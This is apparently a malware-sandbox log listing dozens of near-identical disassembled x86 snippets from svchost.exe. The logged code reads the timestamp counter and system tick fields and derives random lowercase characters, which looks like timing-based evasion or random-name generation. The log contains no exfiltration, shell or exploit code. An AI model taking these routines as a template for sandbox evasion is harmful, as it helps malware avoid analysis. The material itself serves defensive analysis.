Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59113h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59250h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59250h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59915h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F7D6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA598F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA594B3h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA594F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59124h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59130h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4FEF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59375h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F876h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59150h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59250h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59144h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59515h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA590F3h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594F3h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FB96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4F7D6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59550h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA598F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FF96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59213h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
